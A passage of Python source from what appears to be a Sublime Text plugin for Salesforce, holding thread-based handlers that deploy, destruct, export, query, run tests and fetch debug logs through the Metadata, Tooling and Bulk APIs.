                    win.run_command("close")
                if os.path.isfile(_file_or_dir):
                    os.remove(_file_or_dir)
                else:
                    # Directories (lightning bundles) are removed recursively
                    shutil.rmtree(_file_or_dir)
                # Remove related *-meta.xml file from local disk and close the related view
                if ignore_folder and os.path.isfile(_file_or_dir + "-meta.xml"):
                    view = util.get_view_by_file_name(_file_or_dir + "-meta.xml")
                    if view:
                        win.focus_view(view)
                        win.run_command("close")
                    os.remove(_file_or_dir + "-meta.xml")
    settings = context.get_settings()
    api = MetadataApi(settings)
    # Deploy a destructiveChanges package built from the selected files
    base64_encoded_zip = util.build_destructive_package_by_files(dirs_or_files, ignore_folder)
    thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip,))
    thread.start()
    ThreadProgress(api, thread, "Destructing Files", "Destructing Files Succeed")
    handle_destruct_thread(thread, timeout)
def handle_destructive_package_xml(types, timeout=120):
    """Destruct the metadata described by a package.xml-style types dict via Metadata API."""
    def poll_deploy(deploy_thread, interval=120):
        # Re-check the worker every `interval` ms until it has finished;
        # nothing further to do once the deploy completes.
        if deploy_thread.is_alive():
            sublime.set_timeout(lambda: poll_deploy(deploy_thread, interval), interval)
            return

    settings = context.get_settings()
    api = MetadataApi(settings)
    base64_encoded_zip = util.build_destructive_package_by_package_xml(types)
    deploy_thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip,))
    deploy_thread.start()
    ThreadProgress(api, deploy_thread, "Destructing Package.xml", "Destructing Package.xml Succeed")
    poll_deploy(deploy_thread, timeout)
def handle_deploy_thread(base64_encoded_zip, source_org=None, element=None,
                         chosen_classes=[], timeout=120, update_meta=False):
    """
    Deploy code to specified Salesforce org via Metadata API

    @param base64_encoded_zip: code content in base64 encoded
    @param source_org: destination Salesforce org
    @param element: aura element in [Application, Component, Event, Controller, Helper,etc.]
    @param chosen_classes: test classes to run as part of the deployment
        NOTE(review): mutable default argument — safe only while never mutated
    @param timeout: polling interval in milliseconds for the result check
    @param update_meta: whether update component metadata after deployed
    @return: None
    """
    def handle_thread(thread, timeout=120):
        # Poll until the deploy thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If source_org is not None, we need to switch project back
        if settings["switch_back_after_migration"] and source_org:
            util.switch_project(source_org)

        result = api.result
        body = result["body"]
        # Refresh the local lightning component metadata cache on success
        if body["status"] == "Succeeded" and update_meta:
            handle_update_lightning_meta(body, element)

    settings = context.get_settings()
    api = MetadataApi(settings)
    thread = threading.Thread(target=api.deploy, args=(
        base64_encoded_zip,
        chosen_classes,
    ))
    thread.start()
    ThreadProgress(api, thread, "Deploy Metadata to %s" % settings["default_project_name"],
                   "Metadata Deployment Finished")
    handle_thread(thread, timeout)
def handle_update_lightning_meta(body, element, timeout=120):
    """
    Update lightning aura/web component metadata via Tooling API after creation

    :param body: body data returned from SOAP API
    :param element: Aura bundle type in `COMPONENT`, `CONTROLLER`, `HELPER`, `SVG`...
    :param timeout: polling interval in milliseconds for the result check
    :return: None
    """
    def handle_thread(thread, full_name, timeout):
        # Poll until the metadata query finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, full_name, timeout), timeout)
            return

        result = api.result
        if not result or not result["success"]:
            return

        if result["totalSize"] == 0:
            Printer.get("log").write("There is no component data")
            return
        elif result["totalSize"] == 1 and bundle_type == "AuraDefinitionBundle":
            # save single aura definition file
            record = result["records"][0]
            cmp_meta = {
                "name": full_name[:full_name.find('.')],
                "extension": full_name[full_name.find('.'):],
                "id": record["Id"],
                "lastModifiedDate": record["LastModifiedDate"],
                "type": bundle_type,
                "DefType": record["DefType"]
            }
            components_dict[bundle_type][full_name.lower()] = cmp_meta
        elif bundle_type == "LightningComponentBundle":
            # save multiple Lightning Component Resource files
            for record in result["records"]:
                # FilePath looks like "lwc/t2/t2.js-meta.xml"; rebinds full_name per record
                _lwc, bundle_name, full_name = record["FilePath"].split("/")  # lwc/t2/t2.js-meta.xml
                cmp_meta = {
                    "name": full_name[:full_name.find('.')],  # t2.js-meta
                    "extension": full_name[full_name.find('.'):],  # .xml
                    "id": record["Id"],
                    "lastModifiedDate": record["LastModifiedDate"],
                    "type": bundle_type
                }
                components_dict[bundle_type][full_name.lower()] = cmp_meta

        # Save and reload component metadata
        if result["totalSize"] >= 1:
            s.set(username, components_dict)
            sublime.save_settings(context.COMPONENT_METADATA_SETTINGS)
            # Refresh metadata settings
            sublime.set_timeout(lambda: util.load_metadata_cache(True, settings["username"]), 5)

    settings = context.get_settings()
    username = settings["username"]
    s = sublime.load_settings(context.COMPONENT_METADATA_SETTINGS)
    # No cached metadata for this user -> nothing to update
    if not s.has(username):
        return

    component_successes = body["details"]["componentSuccesses"]
    # SOAP serialization returns a bare dict when there is a single success
    if isinstance(component_successes, dict):
        component_successes = [component_successes]

    for item in component_successes:
        bundle_type = item["componentType"]
        if bundle_type in ["AuraDefinitionBundle", "LightningComponentBundle"]:
            base_name = item["fullName"]
            # Aura: fullName + extension derived from `element`; LWC derives names from FilePath later
            full_name = (base_name + context.EXT_DICT.get(element.lower())) \
                if element is not None and bundle_type == "AuraDefinitionBundle" else ""
            components_dict = s.get(username, {})
            # Prevent exception if no component in org
            if bundle_type not in components_dict:
                components_dict = {bundle_type: {}}
            # Build components dict
            api = ToolingApi(settings)
            query_str = "SELECT Id, Format, LastModifiedDate, LastModifiedById "
            if bundle_type == 'AuraDefinitionBundle':
                query_str += ", DefType FROM AuraDefinition WHERE AuraDefinitionBundleId = '%s' and DefType = '%s'"\
                    % (item['id'], element.upper())
            elif bundle_type == 'LightningComponentBundle':
                query_str += ", FilePath FROM LightningComponentResource WHERE LightningComponentBundleId = '%s'"\
                    % (item['id'])
            thread = threading.Thread(target=api.query, args=(query_str, True))
            thread.start()
            ThreadProgress(api, thread, "Update Component Metadata", "Update Component Metadata Finished")
            handle_thread(thread, full_name, timeout)
            # Only the first matching bundle is processed
            break
def handle_track_all_debug_logs_thread(users, timeout=120):
    """
    Create trace flags for every given user, spreading the work over
    several concurrent ToolingApi connections.

    @param users: dict of users to create trace flags for
    @param timeout: unused, kept for signature consistency with siblings
    @return: None
    """
    # Guard: with no users, math.ceil(0 / mcc) would produce a zero chunk size
    if not users:
        return

    settings = context.get_settings()
    # Divide users into pieces of dict, one piece per concurrent connection
    maximum_concurrent_connections = settings["maximum_concurrent_connections"]
    split = math.ceil(len(users) / maximum_concurrent_connections)
    pieces = list(util.dict_chunks(users, split))

    threads = []
    for piece in pieces:
        # Each worker gets its own api instance since result state is per-instance.
        # (The original also built an unused ToolingApi before the loop; removed.)
        api = ToolingApi(settings)
        thread = threading.Thread(target=api.create_trace_flags, args=(piece,))
        thread.start()
        threads.append(thread)
    ThreadsProgress(threads, "Creating Trace Flags", "Creating Trace Flags Finished")
def handle_cancel_deployment_thread(async_process_id, timeout=120):
    """Ask Salesforce to cancel a running metadata deployment in the background."""
    settings = context.get_settings()
    api = MetadataApi(settings)
    options = {"async_process_id": async_process_id}
    worker = threading.Thread(target=api._invoke_method, args=("cancelDeploy", options))
    worker.start()
    ThreadProgress(api, worker, "Canceling Deploy", "Canceling Deploy Succeed")
def handle_close_jobs_thread(job_ids, timeout=120):
    """Close every given bulk job id, each in its own background thread."""
    settings = context.get_settings()
    bulkjob = BulkJob(settings, None, None)
    workers = [threading.Thread(target=bulkjob.close_job, args=(job_id,))
               for job_id in job_ids]
    for worker in workers:
        worker.start()
def handle_bulk_operation_thread(sobject, inputfile, operation, timeout=120):
    """
    Run a Bulk API DML operation against a sobject using records from a csv file.

    @param sobject: sobject API name
    @param inputfile: path of the csv file containing the records
    @param operation: one of "insert", "update", "upsert", "delete"
    @param timeout: unused, kept for signature consistency with siblings
    @return: None
    @raise ValueError: if operation is not one of the supported verbs
    """
    settings = context.get_settings()
    bulkapi = BulkApi(settings, sobject, inputfile)

    # Dispatch table instead of an if/elif chain; the original fell through
    # to a confusing NameError when the operation was unknown.
    targets = {
        "insert": bulkapi.insert,
        "update": bulkapi.update,
        "upsert": bulkapi.upsert,
        "delete": bulkapi.delete,
    }
    if operation not in targets:
        raise ValueError("Unsupported bulk operation: %s" % operation)

    thread = threading.Thread(target=targets[operation], args=())
    thread.start()
    progress_message = operation + " " + sobject
    ThreadProgress(bulkapi, thread, progress_message, progress_message + " Succeed")
def handle_backup_sobject_thread(sobject, soql=None, timeout=120):
    """Export the records of one sobject to csv via the bulk query API."""
    settings = context.get_settings()
    bulkapi = BulkApi(settings, sobject, soql)
    worker = threading.Thread(target=bulkapi.query)
    worker.start()
    wait_message = "Export Records of " + sobject
    ThreadProgress(bulkapi, worker, wait_message, wait_message + " Succeed")
def handle_backup_all_sobjects_thread(timeout=120):
    """
    Describe the org, then export the records of every sobject via bulk query.

    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the describe_global thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        result = api.result
        if not result or not result["success"]: return

        # One bulk query worker per sobject; `thread` is rebound each iteration
        threads = []
        for sobject_describe in api.result["sobjects"]:
            if "name" not in sobject_describe: continue
            bulkapi = BulkApi(settings, sobject_describe["name"])
            thread = threading.Thread(target=bulkapi.query, args=())
            thread.start()
            threads.append(thread)
        wait_message = "Export All Sobjects Records"
        ThreadsProgress(threads, wait_message, wait_message + " Succeed")

    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.describe_global, args=())
    thread.start()
    ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
    handle_thread(thread, timeout)
def handle_export_workflows(settings, timeout=120):
    """
    Export workflow metadata for every sobject in the org.

    @param settings: plugin settings dict (must contain "workspace")
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the describe_global thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If succeed
        sObjects = []
        for sd in api.result["sobjects"]:
            if "name" not in sd: continue
            sObjects.append(sd["name"])
        util.parse_workflow_metadata(settings, sObjects)
        sublime.active_window().run_command("refresh_folder_list")

    outputdir = settings["workspace"] + "/workflow/"
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.describe_global, args=())
    thread.start()
    ThreadProgress(api, thread, "Export All Workflows", "Outputdir: " + outputdir)
    # Honor the timeout parameter (was hard-coded to 10, silently ignoring it)
    handle_thread(thread, timeout)
def handle_export_validation_rules(settings, timeout=120):
    """
    Export validation rule metadata for every sobject in the org.

    @param settings: plugin settings dict
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the describe_global thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If succeed
        sObjects = []
        for sd in api.result["sobjects"]:
            if "name" not in sd: continue
            sObjects.append(sd["name"])
        util.parse_validation_rule(settings, sObjects)
        sublime.active_window().run_command("refresh_folder_list")

    api = ToolingApi(settings)
    thread = threading.Thread(target=api.describe_global, args=())
    thread.start()
    ThreadProgress(api, thread, "Export All Validation Rules", "Validation Rules Export Succeed")
    # Honor the timeout parameter (was hard-coded to 10, silently ignoring it)
    handle_thread(thread, timeout)
def handle_export_customfield(timeout=120):
    """
    Export all CustomField records to <workspace>/.export/CustomField.csv and open it.

    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # Errors are reported by ThreadProgress; just bail out here
        result = api.result
        if not result or not result["success"]: return

        # Write list to csv, sorted by the owning sobject
        outputdir = os.path.join(settings["workspace"], ".export")
        if not os.path.exists(outputdir): os.makedirs(outputdir)
        records = sorted(result["records"], key=lambda k: k['TableEnumOrId'])
        outputfile = os.path.join(outputdir, "CustomField.csv")
        util.list2csv(outputfile, records)

        # Open the csv file
        view = sublime.active_window().open_file(outputfile)

    settings = context.get_settings()
    api = ToolingApi(settings)
    query = "SELECT Id,TableEnumOrId,DeveloperName,NamespacePrefix FROM CustomField"
    thread = threading.Thread(target=api.query, args=(query, True,))
    thread.start()
    ThreadProgress(api, thread, 'Exporting CustomFields', "Exporting CustomFields Succeed")
    # Honor the timeout parameter (was hard-coded to 10, silently ignoring it)
    handle_thread(thread, timeout)
def handle_export_role_hierarchy(timeout=120):
    """
    Export the role hierarchy (with active Salesforce-licensed users) to a file and open it.

    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # Errors are reported by ThreadProgress; just bail out here
        result = api.result
        if not result or not result["success"]: return

        records = result["records"]
        outputfile = util.export_role_hierarchy(records)
        sublime.active_window().run_command("refresh_folder_list")

        # Open file
        view = sublime.active_window().open_file(outputfile)

    settings = context.get_settings()
    api = ToolingApi(settings)
    soql = "SELECT Id, ParentRoleId, Name, " + \
           "(SELECT Id, FirstName, LastName, Username FROM Users " + \
           " WHERE IsActive = true AND Profile.UserLicense.Name = 'Salesforce') " + \
           "FROM UserRole WHERE PortalType = 'None'"
    thread = threading.Thread(target=api.query_all, args=(soql,))
    thread.start()
    ThreadProgress(api, thread, 'Exporting Role Hierarchy', "Role Hierarchy Exporting Succeed")
    # Honor the timeout parameter (was hard-coded to 10, silently ignoring it)
    handle_thread(thread, timeout)
def handle_export_data_template_thread(sobject, recordtype_name, recordtype_id, vertical, timeout=120):
    """
    Export a data-entry template csv for one sobject/record type layout.

    @param sobject: sobject API name
    @param recordtype_name: record type label, used in the output file name
    @param recordtype_id: record type id whose layout is described
    @param vertical: True for a vertical template layout, False for horizontal
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # Errors are reported by ThreadProgress; just bail out here
        result = api.result
        if not result or not result["success"]: return

        # If outputdir is not exist, just make it
        if not os.path.exists(outputdir): os.makedirs(outputdir)

        # Write parsed result to csv
        if vertical:
            util.parse_data_template_vertical(output_file_dir, result)
        else:
            util.parse_data_template_horizontal(output_file_dir, result)

        sublime.active_window().run_command("refresh_folder_list")
        Printer.get("log").write("Data Template for %s: %s" % (sobject, output_file_dir))

    settings = context.get_settings()
    outputdir = settings["workspace"] + "/.export/layoutWorkbooks"
    output_file_dir = "%s/%s-%s.csv" % (
        outputdir, sobject, recordtype_name
    )
    api = ToolingApi(settings)
    url = "/sobjects/%s/describe/layouts/%s" % (sobject, recordtype_id)
    thread = threading.Thread(target=api.get, args=(url,))
    thread.start()
    wait_message = "Export Data Template of %s=>%s" % (sobject, recordtype_name)
    ThreadProgress(api, thread, wait_message, "Outputdir: " + output_file_dir)
    # Honor the timeout parameter (was hard-coded to 120, the same as the default)
    handle_thread(thread, timeout)
def handle_export_query_to_csv(tooling, soql, csv_name, data=None, timeout=120):
    """
    Run a SOQL query and write the result to <workspace>/.export/Query2CSV/<csv_name>.csv.

    @param tooling: True to run the query against the Tooling API
    @param soql: the SOQL statement to execute
    @param csv_name: base name of the output csv file
    @param data: unused, kept for backward compatibility
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_new_view_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
            return

        result = api.result
        if "success" in result and not result["success"]:
            return

        outputdir = os.path.join(settings["workspace"], ".export", "Query2CSV")
        if not os.path.exists(outputdir): os.makedirs(outputdir)
        outputfile = os.path.join(outputdir, "%s.csv" % csv_name)
        # query_to_csv returns bytes, hence the binary mode
        # (removed the unused `time_stamp` local the original computed here)
        with open(outputfile, "wb") as fp:
            fp.write(util.query_to_csv(result, soql))

        # Show the generated csv to the user
        view = sublime.active_window().open_file(outputfile)

    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.query_all, args=(soql, tooling,))
    thread.start()
    progress_message = "Export Query To %s.csv" % csv_name
    ThreadProgress(api, thread, progress_message, progress_message + " Succeed")
    handle_new_view_thread(thread, timeout)
def handle_execute_rest_test(operation, url, data=None, timeout=120):
    """
    Execute a REST call against the org and show the response in a new JSON view.

    @param operation: one of the keys of http_methods_target below, e.g. "Get", "Post"
    @param url: relative REST url (or query/search string for the query operations)
    @param data: request payload for Put/Post/Patch
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_new_view_thread(thread, timeout):
        # Poll until the request thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
            return

        result = api.result

        # Unwrap list/str payloads that the api layer wraps into a dict
        if "list" in result:
            result = result["list"]
        if "str" in result:
            result = result["str"]

        # If response result is just like '"{\\"name\\":\\"test\\"}"'
        # we will remove the \\ and convert it to json automatically
        if settings.get("remove_slash_for_rest_response", False):
            try:
                if "\\" in result:
                    result = result.replace("\\", "")
                    result = result[1:-1]  # strip the surrounding quotes
                    result = json.loads(result)
            except:
                # Best effort only — keep the raw string on any parse error
                pass

        # Remove the useless success attribute
        if isinstance(result, dict) and "success" in result:
            del result["success"]

        # No error, just display log in a new view
        view = sublime.active_window().new_file()
        view.set_syntax_file("Packages/JavaScript/JSON.tmLanguage")
        time_stamp = time.strftime("%H:%M:%S", time.localtime(time.time()))
        view.run_command("new_view", {
            "name": "Rest %s-%s" % (operation, time_stamp),
            "input": json.dumps(result, ensure_ascii=False, indent=4)
        })

    settings = context.get_settings()
    api = ToolingApi(settings)

    # Map the UI operation name to the api method implementing it
    http_methods_target = {
        "Get": api.get,
        "Delete": api.delete,
        "Head": api.head,
        "Put": api.put,
        "Post": api.post,
        "Query": api.query,
        "Tooling Query": api.query,
        "Query All": api.query_all,
        "Retrieve Body": api.retrieve_body,
        "Patch": api.patch,
        "Search": api.search,
        "Quick Search": api.quick_search
    }

    target = http_methods_target[operation]
    if operation in ['Put', 'Post', 'Patch']:
        # These verbs carry a request body
        thread = threading.Thread(target=target, args=(url, data,))
    elif operation == "Tooling Query":
        # Second argument switches api.query into tooling mode
        thread = threading.Thread(target=target, args=(url, True))
    else:
        thread = threading.Thread(target=target, args=(url,))
    thread.start()
    progress_message = "Execute Rest %s Test" % operation
    ThreadProgress(api, thread, progress_message, progress_message + " Succeed", show_error=False)
    handle_new_view_thread(thread, timeout)
def handle_execute_query(soql, timeout=120):
    """Run a SOQL query and show the raw JSON result in a new scratch view."""
    def show_result(worker, interval):
        # Keep polling until the query worker is done
        if worker.is_alive():
            sublime.set_timeout(lambda: show_result(worker, interval), interval)
            return

        result = api.result
        if not result["success"]:
            return

        # Display the result in a fresh view
        result_view = sublime.active_window().new_file()
        result_view.run_command("new_view", {
            "name": "Execute Query Result",
            "input": json.dumps(result, indent=4)
        })

        # Keep the history in the local history rep
        util.add_operation_history('execute_query', soql)

    settings = context.get_settings()
    api = ToolingApi(settings)
    worker = threading.Thread(target=api.query, args=(soql,))
    worker.start()
    ThreadProgress(api, worker, "Execute Query", "Execute Query Succeed")
    show_result(worker, timeout)
def handle_execute_anonymous(apex_string, timeout=120):
    """
    Execute an anonymous Apex script and show the outcome.

    @param apex_string: the Apex code to execute
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_new_view_thread(thread, timeout):
        # Poll until the execute thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
            return

        # If succeed
        result = api.result
        if not result["success"]: return

        # "compiled" arrives from the SOAP XML as a string, hence the text compare
        if result["compiled"] == "false":
            Printer.get('error').write(util.parse_execute_anonymous_xml(result))
        else:
            # No error, just display log in a new view
            view = sublime.active_window().new_file()
            view.run_command("new_view", {
                "name": "Execute Anonymous Result",
                "input": util.parse_execute_anonymous_xml(result)
            })
            view.settings().set("is_debug_log", True)

        # Keep the history apex script to local
        util.add_operation_history('execute_anonymous', apex_string)

    settings = context.get_settings()
    api = ApexApi(settings)
    thread = threading.Thread(target=api.execute_anonymous, args=(apex_string,))
    thread.start()
    ThreadProgress(api, thread, "Execute Anonymous", "Execute Anonymous Succeed")
    handle_new_view_thread(thread, timeout)
def handle_fetch_debug_logs(user_full_name, user_id, timeout=120):
    """Query the latest debug logs of a user and print them as a formatted table."""
    def show_logs(worker, interval):
        # Poll until the log query finishes
        if worker.is_alive():
            sublime.set_timeout(lambda: show_logs(worker, interval), interval)
            return

        result = api.result
        if not result or "records" not in result:
            return

        debug_logs_table = util.format_debug_logs(settings, result["records"])
        Printer.get("log").write_start().write(debug_logs_table)

    settings = context.get_settings()
    api = ToolingApi(settings)
    worker = threading.Thread(target=api.query_logs, args=(settings["last_n_logs"], user_id,))
    worker.start()
    ThreadProgress(api, worker, "List Debug Logs for " + user_full_name,
                   "List Debug Logs for " + user_full_name + " Succeed")
    show_logs(worker, timeout)
def handle_create_debug_log(user_name, user_id, timeout=120):
    """Create a trace flag for the given user so their debug logs get captured."""
    def await_completion(worker, interval):
        # Poll until the trace-flag creation finishes; no follow-up work on success
        if worker.is_alive():
            sublime.set_timeout(lambda: await_completion(worker, interval), interval)
            return
        if not api.result["success"]:
            return

    settings = context.get_settings()
    api = ToolingApi(settings)
    worker = threading.Thread(target=api.create_trace_flag, args=(user_id,))
    worker.start()
    ThreadProgress(api, worker, "Create Debug Log for " + user_name,
                   "Create Debug Log for " + user_name + " Succeed")
    await_completion(worker, timeout)
def handle_view_debug_log_detail(log_id, timeout=120):
    """Fetch the raw body of an ApexLog record and open it in a new view."""
    def show_detail(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: show_detail(worker, interval), interval)
            return
        if not api.result["success"]: return

        detail_view = sublime.active_window().new_file()
        detail_view.run_command("new_view", {
            "name": "Debug Log Detail",
            "input": api.result["str"]
        })
        # Mark the view so debug-log specific features apply to it
        detail_view.settings().set("is_debug_log", True)

    settings = context.get_settings()
    api = ToolingApi(settings)
    url = "/sobjects/ApexLog/" + log_id + "/Body"
    worker = threading.Thread(target=api.retrieve_body, args=(url,))
    worker.start()
    ThreadProgress(api, worker, "Get Log Detail of " + log_id,
                   "Get Log Detail of " + log_id + " Succeed")
    show_detail(worker, timeout)
def handle_run_test(class_name, class_id, timeout=120):
    """
    Run an async test class, show its result in a view, then append code coverage.

    @param class_name: name of the test class (used for messages and history)
    @param class_id: id of the test class to run
    @param timeout: polling interval in milliseconds for the result checks
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the run_test thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If succeed
        result = api.result
        # If error
        if "success" in result and not result["success"]: return
        if not result:
            return Printer.get("error").write("%s is not a test class" % class_name)

        # No error, just display log in a new view
        test_result = util.parse_test_result(result)
        view = sublime.active_window().new_file()
        view.settings().set("word_wrap", "false")
        view.run_command("new_dynamic_view", {
            "view_id": view.id(),
            "view_name": "Test Result",
            "input": test_result
        })

        # Keep the history in the local history rep
        util.add_operation_history('Test/' + class_name, test_result)

        # After run test succeed, get ApexCodeCoverageAggreate
        # (reuses the same `api` instance for the follow-up query)
        query = "SELECT ApexClassOrTrigger.Name, NumLinesCovered, NumLinesUncovered, Coverage " + \
                "FROM ApexCodeCoverageAggregate"
        thread = threading.Thread(target=api.query, args=(query, True,))
        thread.start()
        wait_message = "Get Code Coverage of " + class_name
        ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
        handle_code_coverage_thread(thread, view, timeout)

    def handle_code_coverage_thread(thread, view, timeout):
        # Poll until the coverage query finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_code_coverage_thread(thread, view, timeout), timeout)
            return

        # If error, just skip
        result = api.result
        if "success" in result and not result["success"]:
            return

        # Append the coverage table to the end of the existing test-result view
        code_coverage = util.parse_code_coverage(result)
        view.run_command("new_dynamic_view", {
            "view_id": view.id(),
            "view_name": "Test Result",
            "input": code_coverage,
            "point": view.size()
        })

    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.run_test, args=(class_id,))
    thread.start()
    ThreadProgress(api, thread, "Run Test Class " + class_name, "Run Test for " + class_name + " Succeed")
    handle_thread(thread, timeout)
def handle_run_sync_test(class_names, test_names, timeout=120):
    """
    Run test methods synchronously and show the coverage report.

    @param class_names: list of test class names
        NOTE(review): only class_names[0] is passed to the api even when several
        classes are given — confirm whether multi-class runs are intended
    @param test_names: list of test method names to run
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the synchronous test run finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If succeed
        result = api.result
        if "success" in result and not result["success"]:
            return

        view = sublime.active_window().new_file()
        view.run_command("new_view", {
            "name": "Sync Test Coverage Report",
            "input": util.parse_sync_test_coverage(result)
        })

        # In debug mode, also dump the raw response for inspection
        if settings["debug_mode"]:
            view = sublime.active_window().new_file()
            view.run_command("new_view", {
                "name": "Sync Test Raw Response",
                "input": json.dumps(result, indent=4)
            })

        # Keep the coverage to local cache
        # codeCoverages = result["codeCoverage"]
        # cache_dir = os.path.join(settings["workspace"], ".config")
        # cache_file = os.path.join(cache_dir, "coverage.json")
        #
        # coverages = {}
        # if not os.path.exists(cache_dir):
        #     os.makedirs(cache_dir)
        # elif os.path.isfile(cache_file):
        #     coverages = json.loads(open(cache_file).read())
        #
        # # Upsert exist code coverage info
        # for codeCoverage in codeCoverages:
        #     lowerName = codeCoverage["name"].lower()
        #     coverages[lowerName] = codeCoverage
        #
        # with open(cache_file, "w") as fp:
        #     fp.write(json.dumps(coverages, indent=4))

        # Get the latest debug log
        sublime.active_window().run_command('fetch_debug_log', {
            "fetch_self": True
        })

    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.run_tests_synchronous, args=(class_names[0], test_names))
    thread.start()
    wait_message = "Running Sync Test Classes%s" % (
        " for %s" % class_names[0] if len(class_names) == 1 else ""
    )
    ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
    handle_thread(thread, timeout)
def handle_fetch_code_coverage(file_name, body, timeout=120):
    """Fetch aggregate code coverage for one class/trigger and render it over its body."""
    def show_coverage(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: show_coverage(worker, interval), interval)
            return

        result = api.result
        # No aggregate row means the related tests have never been run
        if "size" not in result or result["size"] == 0:
            return Printer.get("error").write("No code coverage for %s, " % file_name +
                "please run related test class before view code coverage")
        util.view_coverage(file_name, result["records"][0], body)

    # Setup and start the worker thread
    settings = context.get_settings()
    api = ToolingApi(settings)
    q_str = "Select ApexClassOrTrigger.Name, NumLinesCovered, NumLinesUncovered, Coverage" + \
            " From ApexCodeCoverageAggregate Where ApexClassOrTrigger.Name = '%s'" % file_name
    worker = threading.Thread(target=api.query, args=(q_str, True))
    worker.start()
    wait_message = "Get Code Coverage of " + file_name
    ThreadProgress(api, worker, wait_message, wait_message + " Succeed")
    show_coverage(worker, timeout)
def handle_generate_sobject_soql(sobject, filter, timeout=120):
    """Generate a field-complete SOQL statement for a sobject and open it in a view."""
    def show_soql(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: show_soql(worker, interval), interval)
            return

        result = api.result
        # Error messages are processed in ThreadProgress
        if not result["success"]: return

        soql_view = sublime.active_window().new_file()
        soql_view.run_command("new_view", {
            "name": sobject + " SOQL",
            "input": result["soql"]
        })

        # Keep sobject describe history
        util.add_operation_history('SOQL/' + sobject, result["soql"])

    settings = context.get_settings()
    api = ToolingApi(settings)
    # "all" means no field filter is passed to combine_soql
    combine_args = (sobject,) if filter == "all" else (sobject, filter,)
    worker = threading.Thread(target=api.combine_soql, args=combine_args)
    worker.start()
    wait_message = 'Generate SOQL for ' + sobject
    ThreadProgress(api, worker, wait_message, wait_message + ' Succeed')
    show_soql(worker, timeout)
def handle_describe_sobject(sobject, timeout=120):
    """Describe a sobject and render its field summary in a Textile view."""
    def show_describe(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: show_describe(worker, interval), interval)
            return

        result = api.result
        # Error messages are processed in ThreadProgress
        if not result["success"]: return

        describe_view = sublime.active_window().new_file()
        describe_view.settings().set("word_wrap", False)
        describe_result = util.parse_sobject_field_result(result)
        describe_view.run_command("new_view", {
            "name": sobject + " Describe Result",
            "input": describe_result
        })
        describe_view.set_syntax_file("Packages/Textile/Textile.tmLanguage")

        # Keep sobject describe history
        util.add_operation_history('describe/' + sobject, describe_result)

    settings = context.get_settings()
    api = ToolingApi(settings)
    sobject_url = "/sobjects/" + sobject + "/describe"
    worker = threading.Thread(target=api.get, args=(sobject_url,))
    worker.start()
    ThreadProgress(api, worker, 'Describe ' + sobject, 'Describe ' + sobject + ' Succeed')
    show_describe(worker, timeout)
def handle_export_specified_workbooks(sobjects, timeout=120):
    """
    Generate field workbooks for the given sobjects, chunked over
    the allowed number of concurrent connections.

    @param sobjects: list of sobject API names to generate workbooks for
    @param timeout: unused, kept for signature consistency with siblings
    @return: None
    """
    # Guard: an empty list would make the chunk size math.ceil(0 / mcc) == 0
    if not sobjects:
        return

    settings = context.get_settings()
    api = ToolingApi(settings)
    threads = []
    mcc = settings["maximum_concurrent_connections"]
    chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
    for cs in chunked_sobjects:
        thread = threading.Thread(target=api.generate_workbook, args=(cs,))
        threads.append(thread)
        thread.start()
    ThreadsProgress(threads, "Generating Sobjects Workbook",
                    "Sobjects Workbook are Generated")
def handle_export_all_workbooks(timeout=120):
    """
    Describe the org, then generate a field workbook for every sobject,
    chunked over the allowed number of concurrent connections.

    @param timeout: polling interval in milliseconds for the result check
    @return: None
